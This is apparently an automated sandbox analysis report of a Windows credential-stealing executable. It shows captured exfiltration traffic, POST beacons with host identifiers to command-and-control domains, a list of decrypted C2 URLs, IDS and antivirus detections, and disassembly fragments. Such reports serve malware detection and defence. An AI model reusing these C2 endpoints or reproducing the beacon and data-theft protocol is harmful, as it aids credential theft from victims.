2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 92 97 be 57 68 3f f2 a1 37 0e 12 76 69 c1 6e 79 19 c6 8b b5 40 9b 9f 04 c6 09 84 56 ce f4 b8 c2 5b 71 0d ee 85 5e 7a 41 89 78 98 b1 d0 b5 f9 40 d6 db e3 49 6c 60 63 86 31 89 99 3a dc fc 26 82 6f a0 a7 98 23 1a a6 86 ea 3c e7 d9 48 59 06 bd d9 b8 ce 52 38 04 bb cf e6 b4 34 86 40 9b 56 d9 a2 c6 df 85 eb 27 cd 72 8b c3 79 26 e0 14 3e 81 93 51 03 9b 4d 00 05 81 46 eb 1f 99 5d fb 5a 20 6a d8 b5 ec 84 4a 04 31 6b d6 e7 9e e0 98 ba a3 58 36 e7 c5 79 32 7d 5a 47 43 76 3e 09 34 b2 9f 33 25 e1 82 5a 6d f4 75 80 2f ff 6a 82 36 c2 6b cc 38 33 21 af 10 95 aa 36 f1 03 0a 89 bc 29 90 04 cb 13 14 ed 7e e3 ac a2 5f ab 80 94 8f 03 32 fc ed ec f3 f0 4e d0 41 c0 f5 33 ef 2d 65 40 ce b2 ea c2 50 eb a2 db 57 aa e8 9d 58 f6 33 2d 93 8d d9 13 0f 32 33 93 ad 9e 6a 8b f4 ac 34 dd Data Ascii: Wh?7viny@V[q^zAx@Il`c1:&o#<HYR84@V'ry&>QMF]Z jJ1kX6y2}ZGCv>43%Zmu/j6k83!6)~_2NA3-e@PWX3-23j4
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 4d 03 83 4f 43 82 4c f0 3f 51 f3 15 55 6b 54 12 ef 56 12 c4 9f 92 82 7d 51 06 35 0a 82 29 e9 5e 8c d9 6e f5 b6 b6 ef 7d 40 e5 76 a8 09 dc 19 5c 18 61 6f f7 7e 4a 30 17 99 fa 76 33 a8 3a bd ee 72 ec 11 9f 18 14 af 57 6e 2a 28 c6 15 0b ed a6 10 d3 be ec 38 d2 ab ea 74 ff 0a 1b fa 32 a4 62 ce 31 95 90 88 c6 bc 84 45 52 44 71 0d 74 5e b6 3f 24 cc ff 11 41 19 6a c2 3b 0f 1f f2 ad 05 76 a5 07 6f 12 c0 4f 5c f0 30 6b 6d 52 5d c3 e1 08 c4 c2 4e 45 60 cc b0 2e 31 6b 9c c4 78 82 67 10 9b 7e a3 62 10 6d 4e 7b e1 cf f7 78 a7 20 34 11 a5 3b e9 b0 02 37 0c 94 1b f8 bc 05 10 db ca 73 a3 f8 5f ab a7 c1 18 99 df a2 92 2d 53 10 d9 c3 84 19 36 9e 59 3f a7 88 6e 3e 1e fd 2a 2e 11 2b 86 93 21 d9 23 e2 86 6e 82 5b fd e6 a3 0d 61 a1 5d 77 00 28 a4 a5 db f9 f6 56 a6 e6 57 0c 55 Data Ascii: MOCL?QUkTV}Q5)^n}@v\ao~J0v3:rWn(8t2b1ERDqt^?$Aj;voO\0kmR]NE`.1kxg~bmN{x 4;7s_-S6Y?n>.+!#n[a]w(VWU
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 29 6c 3c ae 8a e5 64 a7 ca 4e 89 db 9f 75 fa ba 07 a5 d0 08 ce f7 50 f2 40 da ff db 58 8b 36 0b ae 59 70 9d f9 22 18 0d 67 1a 81 a0 3a 21 7b 33 6a b3 08 4a ae 5c db 56 7d 43 ef 89 c7 86 25 88 11 d1 fe 3f bc 54 1f 03 10 5b ce 6d 39 cc 19 71 12 8c d6 47 52 fe 21 19 d9 9d 0a f8 0c 59 56 52 0f 2b fe e3 ab af a1 88 c9 fe b4 c8 f2 a5 78 fa 6b 40 35 ee 99 69 08 78 61 23 c8 6a 10 f3 3e 95 8c ad 45 97 e3 bb 16 a3 5f 2f 59 2d e5 fe b2 b5 e9 9f 92 ff bd 4c 42 1c c5 74 04 2e e9 49 81 5a d5 80 cd fd f9 e8 e9 8d 9b 5c 74 dc 89 b6 2a ca 9d e2 f3 59 8f c8 2d 4a 5e e2 f3 43 21 5d 4d 92 04 d1 87 48 31 f1 86 01 db b8 b2 90 9e c8 76 5c a3 72 6a d2 66 0a 14 18 c4 47 03 00 b8 7c 38 9b fa 42 33 50 35 cf ea 19 f1 46 2c 58 f7 d4 d4 38 03 d2 d0 c1 e0 93 24 55 55 ae e9 36 44 8b 05 Data Ascii: )l<dNuP@X6Yp"g:!{3jJ\V}C%?T[m9qGR!YVR+xk@5ixa#j>E_/Y-LBt.IZ\t*Y-J^C!]MH1v\rjfG\|8B3P5F,X8$UU6D
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: a3 aa 2d 35 1c ac 01 1c bf 96 2d 8b 89 d7 a1 41 14 ad 5a dd 44 20 75 b0 34 ee 40 75 e6 96 ab 91 14 34 f2 9b 3e d1 60 eb 7b ea 39 78 a4 1e 3d 83 37 97 4d c7 3f 08 e6 8c e8 f7 fb 1f f2 c3 15 2b 15 51 1f 8f c6 67 d4 7c 8e ed 23 d0 7d 2b 84 9f f7 a4 6d 6b 58 d2 f4 0f 6b b9 ae f6 31 fd 79 00 06 34 8b 3a 89 60 72 d8 5e 45 2c 66 55 9f 93 43 32 52 38 e3 0d 86 d0 88 9c 6a 49 ec aa c0 66 f3 68 f3 84 01 02 5d 59 2c 2c fe 37 b6 ca 33 8b 3c 78 50 13 6d 1f f9 34 33 7b c9 fe b9 bd 38 1e 8b d6 2a da 24 ce 0c 77 36 d6 db 23 81 46 88 75 6b 26 fe f6 ee 4e 3e eb c0 48 fd 66 9c 0b d6 1a d6 b8 b5 b6 f9 14 29 34 bd d8 f9 3b d2 98 3a 71 44 94 bc 1c 25 4d 60 3b 47 08 45 5e 63 d4 e8 87 e2 79 22 fb 2c f2 b3 12 08 3a f4 a1 65 c2 40 63 8f d3 1c 4d cb 1f d3 41 ed 93 29 d3 32 f5 93 18 Data Ascii: -5-AZD u4@u4>`{9x=7M?+Qg\|#}+mkXk1y4:`r^E,fUC2R8jIfh]Y,,73<xPm43{8*$w6#Fuk&N>Hf)4;:qD%M`;GE^cy",:e@cMA)2
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 4f 55 09 55 27 4b d9 d9 43 c6 10 6a b8 e8 5d 41 c2 cc 14 e8 98 58 96 5f 2d 58 b6 d1 b8 e3 63 3f 43 a3 5d 3b b3 b2 b6 31 4e c9 e9 0f d8 f9 39 ae d6 d6 ac 14 05 3a 11 0b e3 b3 c1 8f 7d af fe 64 d9 29 7b 7c 49 a2 05 2b 92 fe f2 0f 3b 4e 02 ac ba 55 7a 9b 1a 04 e6 3b 1f 99 5e da 56 60 9f 4d a8 21 92 ac e4 b0 73 b1 b6 be a3 9b 36 93 1f 23 f7 3e f5 84 6e db d9 ab 9b 0f 56 75 d2 46 1e 52 20 f8 65 ee 2f 34 14 f5 cd 2d 9c b7 24 8c aa 9e 24 a5 f3 f8 41 bb 35 bb 38 76 88 cf e1 65 50 b0 43 ec c8 c1 2a 45 bd ba c7 5c ef a7 4e 65 05 fa 81 75 00 3d 84 e8 2b 15 8e 72 6a 83 99 d0 e9 10 c8 b1 61 a6 ff e8 d1 9e 12 96 1f 79 90 44 cd a0 59 ed 7a c7 87 11 30 ca b7 d0 0a 84 d4 0a 0c 21 a6 3f f0 ea 3f 11 10 d7 82 38 24 47 c9 86 87 f1 72 53 38 3f af 5a 84 18 fb 58 2c 70 01 27 c8 Data Ascii: OUU'KCj]AX_-Xc?C];1N9:}d){\|I+;NUz;^V`M!s6#>nVuFR e/4-$$A58vePC*E\Neu=+rjayDYz0!??8$GrS8?ZX,p'
2025-03-07 18:38:21 UTC	818	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:38:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y680HUf5XnB6wS9qu%2BW551MnAz4AXFwLzVkiJ6R%2Ft2fU7MNbu9F4fkpcUNP1NQvOFh2GMxsGshpUe2wPrSrYk0b%2FVR7i3BIddbVhgmbIGBM93tUr8Y211Q%2FcEqzwnD%2BBqadE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc3576e93b00f8-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=555&min_rtt=536&rtt_var=168&sent=489&recv=496&lost=0&retrans=0&sent_bytes=2840&recv_bytes=590897&delivery_rate=6713073&cwnd=252&unsent_bytes=0&cid=f7ff881fabf500dc&ts=5702&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49695	104.21.53.52	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:38:23 UTC	266	OUT	POST /aQwdw HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: nebdulaq.digital
2025-03-07 18:38:23 UTC	85	OUT	Data Raw: 75 69 64 3d 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 26 63 69 64 3d 26 68 77 69 64 3d 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34 Data Ascii: uid=9c3be6f4c5e0a94b189ca0d8299f35fd794488&cid=&hwid=D69207D5222EDA67E3EDCEA778368E34

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49696	188.114.96.3	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:38:31 UTC	269	OUT	POST /QwdZdf HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: begindecafer.world
2025-03-07 18:38:31 UTC	85	OUT	Data Raw: 75 69 64 3d 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 26 63 69 64 3d 26 68 77 69 64 3d 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34 Data Ascii: uid=9c3be6f4c5e0a94b189ca0d8299f35fd794488&cid=&hwid=D69207D5222EDA67E3EDCEA778368E34
2025-03-07 18:38:32 UTC	794	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:38:32 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OByPzbrqHsyvWGSRfh%2BXEghzKxnc4efJsz4QUBsExhM0%2BSXlVT%2Bg7f%2FQrqZOMI5%2FKmsz1spL8C0kVDWuswI%2BAd3miIPMdVSTBxYqHtjWSOZLF%2Bc4F1L%2BkGL4Ub7d5X%2BCwgpMboM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc35d8ee30873b-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=540&min_rtt=540&rtt_var=203&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=7281767&cwnd=252&unsent_bytes=0&cid=cbb1af5767ab2f1a&ts=1383&x=0"
2025-03-07 18:38:32 UTC	43	IN	Data Raw: 8e 45 d0 8f c0 77 a0 7a 34 df da bd f0 8c b0 73 2f 00 d1 79 71 e9 2c 2e c6 bb 4b ae 60 e2 a0 97 66 4c 8d 83 24 14 7e 17 85 f4 ea Data Ascii: Ewz4s/yq,.K`fL$~

Target ID:	0
Start time:	13:37:26
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\FvbuInU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FvbuInU.exe"
Imagebase:	0xd60000
File size:	2'090'496 bytes
MD5 hash:	A4069F02CDD899C78F3A4EE62EA9A89A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1531650734.0000000001590000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1531596694.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: https://begindecafer.world/QwdZdf	Avira URL Cloud: Label: malware
Source: https://begindecafer.world/QwdZdfU	Avira URL Cloud: Label: malware
Source: https://begindecafer.world/	Avira URL Cloud: Label: malware
Source: https://begindecafer.world:443/QwdZdflt-release/key4.dbPK	Avira URL Cloud: Label: malware

Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: nebdulaq.digital/aQwdw
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: begindecafer.world/QwdZdf
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: garagedrootz.top/oPsoJAN
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: modelshiverd.icu/bJhnsj
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: arisechairedd.shop/JnsHY
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: catterjur.run/boSnzhu
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: orangemyther.live/IozZ
Source: 00000000.00000002.1967639649.0000000000D61000.00000040.00000001.01000000.00000003.sdmp	String decryptor: fostinjec.today/LksNAz

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49688 -> 104.21.53.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49687 -> 104.21.53.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49690 -> 104.21.53.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49696 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49689 -> 104.21.53.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 104.21.53.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49691 -> 104.21.53.52:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49694 -> 104.21.53.52:443

Source: FvbuInU.exe	Virustotal: Detection: 76%			Perma Link
Source: FvbuInU.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D7B1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D7B1D8 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D7B55A CryptUnprotectData,	0_2_00D7B55A

Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	0_2_00D900B0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	0_2_00DAC1D0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-25088CECh]	0_2_00D72124
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov ebp, edx	0_2_00DAC320
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	0_2_00D7A430
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D8CBB0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]	0_2_00D80B40
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+10h]	0_2_00D80B40
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-000000FEh]	0_2_00DAD0C0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00D973CB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then lea eax, dword ptr [ecx-6C0B83CEh]	0_2_00D6D780
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D71822
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	0_2_00DAD960
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+14h]	0_2_00D6DA3A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+317AB538h]	0_2_00D6DA3A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	0_2_00D7E0AC
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00D7E0AC
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00D6E174
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+12h]	0_2_00D6C130
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-38B2FA5Ch]	0_2_00D92120
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D92120
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	0_2_00D7E2C6
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	0_2_00DA8240
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+08h]	0_2_00DA8240
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6C0B83D6h]	0_2_00DA8240
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00D6A390
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00D6A390
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_00D7A370
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00D9836E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00D9845D
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+03h]	0_2_00D84430
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D92540
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2Ch]	0_2_00D90650
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-52h]	0_2_00D90670
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]	0_2_00D82792
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 8D94E5DFh	0_2_00DA4750
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	0_2_00DA4750
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	0_2_00DAC8C0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movsx edx, byte ptr [ebx+ecx]	0_2_00DAA88E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00DA0880
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp], ebx	0_2_00D969C1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000B2h]	0_2_00D70994
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov eax, ecx	0_2_00D7EB66
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp word ptr [eax+edx+02h], 0000h	0_2_00DA4B60
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov ebp, eax	0_2_00D68B20
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_00D7EEFE
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000084h]	0_2_00D7EEFE
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62h]	0_2_00D72F82
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	0_2_00DA90EF
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00D892A0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B12B9D2h]	0_2_00D8F3C0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+02h]	0_2_00D71368
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00D7D315
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00D8D32F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_00D974D1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00D7B55A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4AF8CFA6h]	0_2_00D7B55A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_00D7B55A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	0_2_00D7B55A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00DAB680
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00DAB790
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then jmp eax	0_2_00D6F769
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-443B8DA2h]	0_2_00D7D99F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00D7D99F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00DAB9B0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00D89910
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00DAB900
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov edx, edi	0_2_00D83A80
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-79B0712Ah]	0_2_00D8DAA2
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_00D8DAA2
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	0_2_00D8DAA2
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	0_2_00DABA40
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+12EB444Ah]	0_2_00D6FB20
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+5Dh]	0_2_00D6DC9E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00D93EE0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+03h]	0_2_00D85F40
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68h]	0_2_00D7FF37
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+02h]	0_2_00D89F30

Source: global traffic	HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: nebdulaq.digital
Source: global traffic	HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RX3IfGZa8MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14875Host: nebdulaq.digital
Source: global traffic	HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=vfAsqCzce7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15056Host: nebdulaq.digital
